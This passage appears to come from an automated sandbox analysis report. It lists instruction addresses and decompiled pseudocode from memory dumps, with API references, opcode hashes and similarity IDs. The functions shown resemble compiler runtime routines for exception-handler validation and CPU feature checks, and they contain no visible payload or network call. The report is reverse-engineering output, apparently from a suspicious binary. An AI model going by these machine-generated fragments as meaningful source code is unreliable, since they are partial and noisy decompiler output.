                                                                                                                                                                                                                                0x736e07d5
                                                                                                                                                                                                                                0x736e07d8
                                                                                                                                                                                                                                0x736e07db
                                                                                                                                                                                                                                0x736e07e7
                                                                                                                                                                                                                                0x736e07ef
                                                                                                                                                                                                                                0x736e078c
                                                                                                                                                                                                                                0x736e078f
                                                                                                                                                                                                                                0x736e079b
                                                                                                                                                                                                                                0x736e07a1
                                                                                                                                                                                                                                0x736e07a7
                                                                                                                                                                                                                                0x736e07aa
                                                                                                                                                                                                                                0x736e07b3
                                                                                                                                                                                                                                0x736e07b3
                                                                                                                                                                                                                                0x736e07f2
                                                                                                                                                                                                                                0x736e0800
                                                                                                                                                                                                                                0x736e0806
                                                                                                                                                                                                                                0x736e0809
                                                                                                                                                                                                                                0x736e080e
                                                                                                                                                                                                                                0x736e0810
                                                                                                                                                                                                                                0x736e0813
                                                                                                                                                                                                                                0x736e0813
                                                                                                                                                                                                                                0x736e0818
                                                                                                                                                                                                                                0x736e081a
                                                                                                                                                                                                                                0x736e081d
                                                                                                                                                                                                                                0x736e081d
                                                                                                                                                                                                                                0x736e0822
                                                                                                                                                                                                                                0x736e0824
                                                                                                                                                                                                                                0x736e0827
                                                                                                                                                                                                                                0x736e0827
                                                                                                                                                                                                                                0x736e082c
                                                                                                                                                                                                                                0x736e082e
                                                                                                                                                                                                                                0x736e0831
                                                                                                                                                                                                                                0x736e0831
                                                                                                                                                                                                                                0x736e0836
                                                                                                                                                                                                                                0x736e0838
                                                                                                                                                                                                                                0x736e0838
                                                                                                                                                                                                                                0x736e0845
                                                                                                                                                                                                                                0x736e0848
                                                                                                                                                                                                                                0x736e087f
                                                                                                                                                                                                                                0x736e084a
                                                                                                                                                                                                                                0x736e084a
                                                                                                                                                                                                                                0x736e084d
                                                                                                                                                                                                                                0x736e0878
                                                                                                                                                                                                                                0x736e086d
                                                                                                                                                                                                                                0x736e086d
                                                                                                                                                                                                                                0x736e0881
                                                                                                                                                                                                                                0x736e0889
                                                                                                                                                                                                                                0x736e088c
                                                                                                                                                                                                                                0x736e08ab
                                                                                                                                                                                                                                0x736e08b0
                                                                                                                                                                                                                                0x736e08b0
                                                                                                                                                                                                                                0x736e08b2
                                                                                                                                                                                                                                0x736e08b7
                                                                                                                                                                                                                                0x736e08c3
                                                                                                                                                                                                                                0x736e08b9
                                                                                                                                                                                                                                0x736e08bc
                                                                                                                                                                                                                                0x736e08bc
                                                                                                                                                                                                                                0x736e08c8
                                                                                                                                                                                                                                0x736e08c8
                                                                                                                                                                                                                                0x736e088e
                                                                                                                                                                                                                                0x736e0891
                                                                                                                                                                                                                                0x736e08a0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736e08a0
                                                                                                                                                                                                                                0x736e0893
                                                                                                                                                                                                                                0x736e0896
                                                                                                                                                                                                                                0x736e0898
                                                                                                                                                                                                                                0x736e0898
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,736E05CE,?,?,00000008,?,?,736E0262,00000000), ref: 736E0800
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 05cb680177b5e95ff39e40ae2e72bfa2743d1e853c3dc6def163b9372af648d7
                                                                                                                                                                                                                                • Instruction ID: 0168eedf4b05a1b7499e8a4d502c259459069475ae3d95db47ad5f63623746db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05cb680177b5e95ff39e40ae2e72bfa2743d1e853c3dc6def163b9372af648d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBB186316216088FDB05DF29C586B957BB0FF45364F298258E89ACF2E1C335E996CF81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8B139(long _a4) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				short* _v32;
                                                                                                                                                                                                                                				void _v36;
                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				signed int* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                				signed int _t77;
                                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                                				void _t80;
                                                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                                                				signed int _t84;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				short* _t87;
                                                                                                                                                                                                                                				void* _t89;
                                                                                                                                                                                                                                				signed int* _t90;
                                                                                                                                                                                                                                				long _t91;
                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                                                				signed int _t100;
                                                                                                                                                                                                                                				signed int _t102;
                                                                                                                                                                                                                                				void* _t104;
                                                                                                                                                                                                                                				long _t108;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t108 = _a4;
                                                                                                                                                                                                                                				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                						_t91 = 0;
                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                						_a4 = 0;
                                                                                                                                                                                                                                						_t57 = _t76;
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							_t80 =  *_t57;
                                                                                                                                                                                                                                							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                							if(_t80 >= _t91) {
                                                                                                                                                                                                                                								L20:
                                                                                                                                                                                                                                								_t63 = 0;
                                                                                                                                                                                                                                								L60:
                                                                                                                                                                                                                                								return _t63;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                								_t12 =  &_a4;
                                                                                                                                                                                                                                								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                								__eflags =  *_t12;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t91 = _t91 + 1;
                                                                                                                                                                                                                                							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                						} while (_t91 <= _t102);
                                                                                                                                                                                                                                						__eflags = _a4;
                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                							_t81 =  *0xa8d318; // 0x0
                                                                                                                                                                                                                                							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                							_t58 = 0;
                                                                                                                                                                                                                                							__eflags = _t81;
                                                                                                                                                                                                                                							if(_t81 <= 0) {
                                                                                                                                                                                                                                								L18:
                                                                                                                                                                                                                                								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                								__eflags = _t61;
                                                                                                                                                                                                                                								if(_t61 < 0) {
                                                                                                                                                                                                                                									_t62 = 0;
                                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t62 = _a4;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								__eflags = _t62;
                                                                                                                                                                                                                                								if(_t62 == 0) {
                                                                                                                                                                                                                                									L59:
                                                                                                                                                                                                                                									_t63 = _t104;
                                                                                                                                                                                                                                									goto L60;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                										goto L59;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                										L46:
                                                                                                                                                                                                                                										_t63 = 1;
                                                                                                                                                                                                                                										 *0xa8d360 = 1;
                                                                                                                                                                                                                                										__eflags =  *0xa8d360;
                                                                                                                                                                                                                                										if( *0xa8d360 != 0) {
                                                                                                                                                                                                                                											goto L60;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										_t84 =  *0xa8d318; // 0x0
                                                                                                                                                                                                                                										__eflags = _t84;
                                                                                                                                                                                                                                										_t93 = _t84;
                                                                                                                                                                                                                                										if(_t84 <= 0) {
                                                                                                                                                                                                                                											L51:
                                                                                                                                                                                                                                											__eflags = _t93;
                                                                                                                                                                                                                                											if(_t93 != 0) {
                                                                                                                                                                                                                                												L58:
                                                                                                                                                                                                                                												 *0xa8d360 = 0;
                                                                                                                                                                                                                                												goto L5;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_t77 = 0xf;
                                                                                                                                                                                                                                											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                											if(_t84 <= _t77) {
                                                                                                                                                                                                                                												_t77 = _t84;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_t94 = 0;
                                                                                                                                                                                                                                											__eflags = _t77;
                                                                                                                                                                                                                                											if(_t77 < 0) {
                                                                                                                                                                                                                                												L56:
                                                                                                                                                                                                                                												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                												if(_t84 < 0x10) {
                                                                                                                                                                                                                                													_t86 = _t84 + 1;
                                                                                                                                                                                                                                													__eflags = _t86;
                                                                                                                                                                                                                                													 *0xa8d318 = _t86;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												do {
                                                                                                                                                                                                                                													_t68 = 0xa8d320 + _t94 * 4;
                                                                                                                                                                                                                                													_t94 = _t94 + 1;
                                                                                                                                                                                                                                													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                													 *_t68 = _t110;
                                                                                                                                                                                                                                													_t110 =  *_t68;
                                                                                                                                                                                                                                												} while (_t94 <= _t77);
                                                                                                                                                                                                                                												goto L56;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										_t69 = 0xa8d31c + _t84 * 4;
                                                                                                                                                                                                                                										while(1) {
                                                                                                                                                                                                                                											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                											if( *_t69 == _t110) {
                                                                                                                                                                                                                                												goto L51;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_t93 = _t93 - 1;
                                                                                                                                                                                                                                											_t69 = _t69 - 4;
                                                                                                                                                                                                                                											__eflags = _t93;
                                                                                                                                                                                                                                											if(_t93 > 0) {
                                                                                                                                                                                                                                												continue;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											goto L51;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										goto L51;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t87 = _v32;
                                                                                                                                                                                                                                									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                										goto L59;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                										goto L59;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                										goto L59;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                										goto L59;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                									if(_t78 < _t72) {
                                                                                                                                                                                                                                										goto L46;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                										goto L46;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                										goto L20;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L16;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                								__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                								if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t58 = _t58 + 1;
                                                                                                                                                                                                                                								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                								if(_t58 < _t81) {
                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							__eflags = _t58;
                                                                                                                                                                                                                                							if(_t58 <= 0) {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *0xa8d360 = 1;
                                                                                                                                                                                                                                							__eflags =  *0xa8d360;
                                                                                                                                                                                                                                							if( *0xa8d360 != 0) {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                								_t100 = 0;
                                                                                                                                                                                                                                								__eflags = _t58;
                                                                                                                                                                                                                                								if(_t58 < 0) {
                                                                                                                                                                                                                                									L34:
                                                                                                                                                                                                                                									 *0xa8d360 = 0;
                                                                                                                                                                                                                                									goto L5;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                									L33:
                                                                                                                                                                                                                                									_t90 = 0xa8d320 + _t100 * 4;
                                                                                                                                                                                                                                									_t100 = _t100 + 1;
                                                                                                                                                                                                                                									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                									 *_t90 = _t110;
                                                                                                                                                                                                                                									_t110 =  *_t90;
                                                                                                                                                                                                                                								} while (_t100 <= _t58);
                                                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                                							_t58 = _t25;
                                                                                                                                                                                                                                							__eflags = _t58;
                                                                                                                                                                                                                                							if(_t58 < 0) {
                                                                                                                                                                                                                                								L28:
                                                                                                                                                                                                                                								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                								if(_t81 < 0x10) {
                                                                                                                                                                                                                                									_t81 = _t81 + 1;
                                                                                                                                                                                                                                									__eflags = _t81;
                                                                                                                                                                                                                                									 *0xa8d318 = _t81;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                                								_t58 = _t28;
                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                                								L25:
                                                                                                                                                                                                                                								__eflags =  *((intOrPtr*)(0xa8d320 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                								if( *((intOrPtr*)(0xa8d320 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t58 = _t58 - 1;
                                                                                                                                                                                                                                								__eflags = _t58;
                                                                                                                                                                                                                                								if(_t58 >= 0) {
                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							__eflags = _t58;
                                                                                                                                                                                                                                							if(__eflags >= 0) {
                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                									goto L34;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L28;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                						if(_t75 < _v8) {
                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                						if(_t75 >= _t108) {
                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					_t63 = 1;
                                                                                                                                                                                                                                					goto L60;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}




































                                                                                                                                                                                                                                0x00a8b1ea
                                                                                                                                                                                                                                0x00a8b1ef
                                                                                                                                                                                                                                0x00a8b1f1
                                                                                                                                                                                                                                0x00a8b26f
                                                                                                                                                                                                                                0x00a8b26f
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b1f3
                                                                                                                                                                                                                                0x00a8b271
                                                                                                                                                                                                                                0x00a8b273
                                                                                                                                                                                                                                0x00a8b354
                                                                                                                                                                                                                                0x00a8b354
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b279
                                                                                                                                                                                                                                0x00a8b279
                                                                                                                                                                                                                                0x00a8b280
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b286
                                                                                                                                                                                                                                0x00a8b28a
                                                                                                                                                                                                                                0x00a8b2e6
                                                                                                                                                                                                                                0x00a8b2e8
                                                                                                                                                                                                                                0x00a8b2f0
                                                                                                                                                                                                                                0x00a8b2f2
                                                                                                                                                                                                                                0x00a8b2f4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2f6
                                                                                                                                                                                                                                0x00a8b2fc
                                                                                                                                                                                                                                0x00a8b2fe
                                                                                                                                                                                                                                0x00a8b300
                                                                                                                                                                                                                                0x00a8b315
                                                                                                                                                                                                                                0x00a8b315
                                                                                                                                                                                                                                0x00a8b317
                                                                                                                                                                                                                                0x00a8b346
                                                                                                                                                                                                                                0x00a8b34d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b34d
                                                                                                                                                                                                                                0x00a8b31b
                                                                                                                                                                                                                                0x00a8b31c
                                                                                                                                                                                                                                0x00a8b31e
                                                                                                                                                                                                                                0x00a8b320
                                                                                                                                                                                                                                0x00a8b320
                                                                                                                                                                                                                                0x00a8b322
                                                                                                                                                                                                                                0x00a8b324
                                                                                                                                                                                                                                0x00a8b326
                                                                                                                                                                                                                                0x00a8b33a
                                                                                                                                                                                                                                0x00a8b33a
                                                                                                                                                                                                                                0x00a8b33d
                                                                                                                                                                                                                                0x00a8b33f
                                                                                                                                                                                                                                0x00a8b33f
                                                                                                                                                                                                                                0x00a8b340
                                                                                                                                                                                                                                0x00a8b340
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b331
                                                                                                                                                                                                                                0x00a8b332
                                                                                                                                                                                                                                0x00a8b334
                                                                                                                                                                                                                                0x00a8b336
                                                                                                                                                                                                                                0x00a8b336
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b328
                                                                                                                                                                                                                                0x00a8b326
                                                                                                                                                                                                                                0x00a8b302
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b30b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b30d
                                                                                                                                                                                                                                0x00a8b30e
                                                                                                                                                                                                                                0x00a8b311
                                                                                                                                                                                                                                0x00a8b313
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b313
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b309
                                                                                                                                                                                                                                0x00a8b28c
                                                                                                                                                                                                                                0x00a8b28f
                                                                                                                                                                                                                                0x00a8b294
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b29d
                                                                                                                                                                                                                                0x00a8b29f
                                                                                                                                                                                                                                0x00a8b2a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2ab
                                                                                                                                                                                                                                0x00a8b2b1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2b7
                                                                                                                                                                                                                                0x00a8b2b9
                                                                                                                                                                                                                                0x00a8b2c2
                                                                                                                                                                                                                                0x00a8b2c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2cc
                                                                                                                                                                                                                                0x00a8b2cf
                                                                                                                                                                                                                                0x00a8b2d1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2d8
                                                                                                                                                                                                                                0x00a8b2da
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2dc
                                                                                                                                                                                                                                0x00a8b2e0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8b2e0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A8B1EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2850889275-0
                                                                                                                                                                                                                                • Opcode ID: 7b93a7f5997be97e91412d32938149cb7169fc72dbeabfd9192c09dcca6df15d
                                                                                                                                                                                                                                • Instruction ID: 429ec9718c789a030f202aff55c8abb9ab10c6276a71c41016b58777a2a3010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b93a7f5997be97e91412d32938149cb7169fc72dbeabfd9192c09dcca6df15d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1461E330620606DFDB29EF29C8D4AB973A5FB55314F288228D855CF6A5E730DD42C774
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E736D78D7(signed int __edx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                				signed int _t78;
                                                                                                                                                                                                                                				intOrPtr* _t82;
                                                                                                                                                                                                                                				signed int _t85;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				intOrPtr* _t93;
                                                                                                                                                                                                                                				signed int _t96;
                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t90 = __edx;
                                                                                                                                                                                                                                				 *0x736ef48c =  *0x736ef48c & 0x00000000;
                                                                                                                                                                                                                                				 *0x736eb010 =  *0x736eb010 | 0x00000001;
                                                                                                                                                                                                                                				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                                                                                                                                                                					L23:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                				_push(_t74);
                                                                                                                                                                                                                                				_t93 =  &_v40;
                                                                                                                                                                                                                                				asm("cpuid");
                                                                                                                                                                                                                                				_t75 = _t74;
                                                                                                                                                                                                                                				 *_t93 = 0;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                                                                                                                                                                                                				 *(_t93 + 0xc) = _t90;
                                                                                                                                                                                                                                				_v16 = _v40;
                                                                                                                                                                                                                                				_v12 = _v28 ^ 0x49656e69;
                                                                                                                                                                                                                                				_v8 = _v36 ^ 0x756e6547;
                                                                                                                                                                                                                                				_push(_t75);
